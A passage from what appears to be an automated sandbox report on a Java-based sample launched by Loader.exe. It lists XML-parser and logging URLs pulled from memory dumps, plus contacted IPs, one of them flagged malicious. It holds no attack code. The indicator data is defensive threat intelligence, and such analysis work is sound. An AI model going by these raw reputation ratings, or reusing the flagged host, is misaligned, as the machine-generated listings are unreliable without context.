                                                                                      http://xml.org/sax/features/string-interningjavaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://apache.org/xml/properties/internal/document-scanner5javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://apache.org/xml/features/internal/parser-settingsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://apache.org/xml/features/dom/include-ignorable-whitespacejavaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://apache.org/xml/features/create-cdata-nodesjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://javafx.com/javafx/8javaw.exe, 00000003.00000002.4539258471.000000000AA64000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://java.sun.com/xml/dom/properties/javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://apache.org/xml/properties/internal/stax-entity-resolverjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://apache.org/xml/features/namespacesqjavaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://apache.org/xml/features/xinclude/fixup-base-uris6javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://javax.xml.XMLConstants/feature/secure-processingjavaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://apache.org/xml/features/xinclude/fixup-base-urisjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.oracle.com/technetwork/java/javafx/index.htmljavaw.exe, 00000003.00000002.4539258471.000000000ACF5000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://apache.org/xml/properties/internal/error-reporterjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://apache.org/xml/properties/internal/namespace-contextjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://apache.org/xml/features/validation/schema:javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://apache.org/xml/features/warn-on-duplicate-entitydefjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://xml.org/sax/features/namespace-prefixes1javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.slf4j.org/codes.html#multiple_bindingsjavaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://apache.org/xml/properties/schema/external-schemaLocationJjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://javax.xml.XMLConstants/property/accessExternalSchemajavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://apache.org/xml/features/nonvalidating/load-external-dtdAjavaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://apache.org/xml/features/include-commentsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://apache.org/xml/features/scanner/notify-char-refsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://javax.xml.transform.sax.SAXResult/feature#javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://apache.org/xml/properties/internal/symbol-table6javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://java.sun.com/xml/stream/properties/report-cdata-eventjavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://javax.xml.XMLConstants/property/accessExternalStylesheet8javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://apache.org/xml/features/scanner/notify-char-refs:javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace3javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://apache.org/xml/properties/dom/current-element-node7javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.venjavaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://java.sun.com/xml/stream/properties/ignore-external-dtdjavaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://javax.xml.XMLConstants/property/accessExternalSchema$javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://javax.xml.transform.stax.StAXSource/featurejavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://apache.org/xml/features/continue-after-fatal-errorjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://apache.org/xml/features/standard-uri-conformantjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://apache.org/xml/properties/internal/document-scannerjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://xml.org/sax/features/use-entity-resolver2javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://bugreport.sun.com/bugreport/javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A418000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://apache.org/xml/properties/internal/entity-resolverjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://java.oracle.com/javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A41D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://xml.org/sax/features/external-parameter-entities8javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://apache.org/xml/features/javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://apache.org/xml/features/generate-synthetic-annotationsjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorLoader.exe, 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp, Loader.exe, 00000000.00000003.2075234832.000000000088B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000000.2070869856.0000000000409000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://apache.org/xml/properties/internal/stax-entity-resolver1C5javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://www.slf4j.org/codes.htmla3javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://xml.org/sax/features/allow-dtd-events-after-endDTDjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://apache.org/xml/features/validation/balance-syntax-treesjavaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://www.slf4j.org/codes.html#substituteLoggerjavaw.exe, 00000003.00000002.4543801058.0000000015C4B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335705359.0000000016B17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://apache.org/xml/features/include-comments1javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://xml.org/sax/features/string-interningfeaturejavaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.slf4j.org/codes.html#loggerNameMismatch&ojavaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://apache.org/xml/features/namespace-growth;javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://apache.org/xml/properties/internal/namespace-binderjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://apache.org/xml/properties/input-buffer-sizeache.ojavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://www.slf4j.org/codes.html#StaticLoggerBinderjavaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://www.oracle.com/xml/is-standalonejavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://javax.xml.transform.sax.SAXTransformerFactory/featurejavaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://xml.org/sax/features/validationjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://javax.xml.XMLConstants/property/accessExternalStylesheetjavaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://apache.org/xml/features/scanner/notify-builtin-refs7javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://apache.org/xml/properties/internal/xinclude-handlerjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://xml.org/sax/features/validation?javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://apache.org/xml/properties/security-managerjavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://java.sun.com/xml/dom/properties/ancestor-checkjavaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://xml.apache.org/xsltjavaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2231217783.0000000015BEE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://java.sun.com/xml/stream/properties/javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://www.slf4j.org/codes.html#StaticLoggerBinder&Cjavaw.exe, 00000003.00000003.2335794856.0000000016CA1000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545973178.0000000016CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://apache.org/xml/features/validation/schemajavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://javax.xml.transform.stax.StAXResult/featurejavaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://asm.objectweb.orgjavaw.exe, 00000003.00000002.4539258471.000000000A66F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://apache.org/xml/properties/internal/dtd-scannerjavaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              94.198.159.10
                                                                                                                                                                                                                                              		ntp.time.nlNetherlands
                                                                                                                                                                                                                                              		1140SIDNNLfalse
                                                                                                                                                                                                                                              213.239.239.164
                                                                                                                                                                                                                                              		ntp1.hetzner.deGermany
                                                                                                                                                                                                                                              		24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                              194.58.203.20
                                                                                                                                                                                                                                              		gbg1.ntp.netnod.seSweden
                                                                                                                                                                                                                                              		57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                                                                                                                                                                                                                              104.37.175.218
                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                              		396073MAJESTIC-HOSTING-01UStrue
                                                                                                                                                                                                                                              5.2.81.126
                                                                                                                                                                                                                                              		erdogansigorta.comTurkey
                                                                                                                                                                                                                                              		3188ALASTYRTRfalse
                                                                                                                                                                                                                                              62.149.0.30
                                                                                                                                                                                                                                              		ntp.time.in.uaUkraine
                                                                                                                                                                                                                                              		15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                                                                                                                                                                                              169.229.128.134
                                                                                                                                                                                                                                              		ntp1.net.berkeley.eduUnited States
                                                                                                                                                                                                                                              		25UCBUSfalse
                                                                                                                                                                                                                                              129.250.35.250
                                                                                                                                                                                                                                              		x.ns.gin.ntt.netUnited States
